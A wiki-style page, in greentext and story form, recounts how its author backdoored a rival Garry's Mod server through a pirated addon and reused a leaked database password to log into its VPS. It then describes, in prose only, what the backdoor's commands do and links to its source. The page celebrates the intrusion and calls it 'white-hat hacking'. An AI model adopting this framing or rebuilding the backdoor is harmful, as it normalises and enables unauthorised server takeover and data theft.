King of Sky

Garry's Mod Server owned by MrTheBank as a competitor of SPKZ DarkRP.

Lore

>Be me, a 14 yo young catboy playing gmod at his freetime
>discovers a competitor darkrp server which had taken his fair share of users
>decides to walk in a little bit and found out mfer using pirated vcmod
>one of my fren is a mod at his server
>me have lejit version of VCMod and ELS so I decided to spice things up a little
>developed lbd.lua for lulz
>gave the "infected" version of the addon
>launch the attack with friends in TeamSpeak3 Server
>the friend gave himself superadmin and start wreaking havoc
>while me was white-hat hacking and more focused on privilege escalation, checking how C&C were doing
>all is well so I dump his MySQL Config and fortunately, blud reused his password
>logs into Administrator account on VPS using same password as MySQL
>am in
>accidentally kicked blud out of his remote session
>tries to create new user to log in another time
>got kicked out of RDP so i tried again
>server admin so panik he shut down his VPS.
>As a competitor in DarkRP business, I got invited over for his recent "disaster" regarding the backdoor incident.
>I assess the damage and recommends him to harden his system by not reusing passwords and stop using pirated addons.
>somehow, but not quite close. Years have passed. Blud probably didn't know I was the hackerman
>released this source code back in 2018 on pastebin.
>officially retires from being gmod admin

The King of Sky Server Incident: A Tale of Cybercat Mischief

In the vast digital expanse of the gaming universe, where catboys and hackers alike roam freely, there lived a particularly clever and mischievous halfbreed known as MoNoRi-Chan. A young catboy of just 14 years, MoNoRi-Chan spent his free time immersed in the chaotic and endlessly entertaining world of Garry's Mod (GMod). His sharp intellect and knack for coding were well-known among his friends, but it was his playful and creative spirit that set the stage for an incident that would go down in gaming history: The King of Sky Server Incident.

The Discovery

One fateful day, while exploring the digital realms of various DarkRP servers, MoNoRi-Chan stumbled upon a competitor's server that had mysteriously siphoned off a fair share of users from his own favorite hangout. This server, aptly named the King of Sky, was thriving—but not without its secrets. With his feline curiosity piqued, MoNoRi-Chan decided to investigate further.

The Plan

Upon closer inspection, he discovered that the server was running a pirated version of VCMod, a popular vehicle modification addon. This revelation sparked an idea. MoNoRi-Chan, always one for a bit of digital mischief, decided to "spice things up a little." With the legitimate version of VCMod and ELS at his disposal, he set out to develop a backdoor script—lovingly dubbed lbd.lua—designed to infiltrate and manipulate the server's operations.

MoNoRi-Chan’s friend, who was a moderator on the King of Sky server, was more than happy to join in on the fun. Together, they crafted an "infected" version of the addon and surreptitiously introduced it to the server.

The Execution

The night of the grand operation was set. MoNoRi-Chan and his friends gathered in a TeamSpeak3 server, their excitement palpable. The plan was simple: his friend would use the backdoor to grant himself superadmin privileges and unleash chaos, while MoNoRi-Chan focused on more subtle manipulations and privilege escalation.

As the friend wreaked havoc across the King of Sky server, MoNoRi-Chan monitored the Command and Control (C&C) infrastructure, ensuring everything ran smoothly. It was a scene of digital pandemonium—players were booted, settings were altered, and the once-stable server descended into chaos.

The Breakthrough

In the midst of this controlled chaos, MoNoRi-Chan made a crucial discovery. The server's MySQL configuration was ripe for the taking, and to his delight, the admin had reused the passwords. With this knowledge in hand, MoNoRi-Chan logged into the VPS (Virtual Private Server) using the compromised credentials, gaining full administrative access.

His triumph was short-lived, however. In a moment of overzealousness, MoNoRi-Chan accidentally kicked the server admin out of his remote session. Panicked, the admin shut down the VPS in a desperate attempt to regain control. This interruption was just a minor setback for MoNoRi-Chan, who had almost able to create a new user account to facilitate future access.

The Aftermath

The fallout was swift and dramatic. The King of Sky server was in disarray, and its admin, unaware of the true culprit, sought advice on how to recover from the disaster. As a competitor in the DarkRP business, MoNoRi-Chan was ironically invited to assess the damage and offer recommendations. He advised the admin to strengthen his security by avoiding password reuse and steering clear of pirated addons—a sage piece of advice from the very architect of the chaos.

Years passed, and the incident became a legendary tale among GMod players. The King of Sky server admin never discovered the true identity of the hackerman who had caused so much trouble. In 2018, MoNoRi-Chan decided to release the source code of the backdoor on Pastebin, officially retiring from his days as a GMod admin and hackerman.

Epilogue

The King of Sky Server Incident remains a cautionary tale in the annals of gaming lore. It serves as a reminder of the ingenuity and mischief that can arise from the intersection of curiosity and technical prowess. For MoNoRi-Chan, it was a chapter of youthful exuberance and digital adventure, forever etched in the memories of those who witnessed the chaos unfold.

The Lua Backdoor

Source code: https://pastebin.com/ryTwR4yM (Published Jan 13th, 2018)

This Lua script is a backdoor developed by MoNoRi-Chan ^{(Script Kiddie Arc)}; designed to allow unauthorized access and control over a Garry's Mod server. Let's break down what each part does and why it's dangerous:

1. Encoding and Decoding Functions

Base64 Encoding and Decoding:

These functions encode and decode data using Base64, a method of converting binary data into text.

2. Decryption Function

String Conversion and Decryption:

This section decrypts a string of numbers into characters and decodes it from Base64. This is typically used to obscure the URL or command that the backdoor will call.

This allows the attacker to obfuscate any commands to prevent basic decompiling.

3. HTTP Post Function

Sending Data to a Remote Server:

This function sends data to a URL (decrypted from the string a) using an HTTP POST request. This allows the backdoor to communicate with a remote server.

4. Console Commands and User Group Manipulation

Adding Console Commands:

These lines define various console commands that can be executed on the server:

• xh: Executes a command using game.ConsoleCommand.
• xl: Runs a string of Lua code using RunString.
• gx: Sets a user's group, potentially granting superadmin privileges.
• xk: Forces other players to stop rendering 3D graphics, crashing their Garry's Mod client.
• td: Posts the result of a global variable to the remote server.
• fd: Reads a file's content and posts it to the remote server.

5. Database Configuration Leakage

Leaking Database Configurations:

If the server uses a MySQL database configuration, this line will send the configuration details to the attacker's server, potentially compromising the entire database.

Summary

This script is a sophisticated backdoor that enables an attacker to:

1. Execute arbitrary commands on the server.
2. Gain admin privileges.
3. Disrupt player experience.
4. Steal sensitive data, including database configurations.

Why You Should Avoid Pirated Addons

1. Security Risks: As demonstrated, pirated addons can contain malicious code like backdoors, compromising your server's security.
2. Legal Issues: Using pirated software is illegal and can lead to legal consequences.
3. Support and Updates: Legitimate purchases often come with support and updates, ensuring the addon works correctly and securely.

Conclusion

Always use trusted sources for your addons and regularly review code for any signs of malicious intent. Running unknown or pirated software can have severe consequences for your server's security and integrity.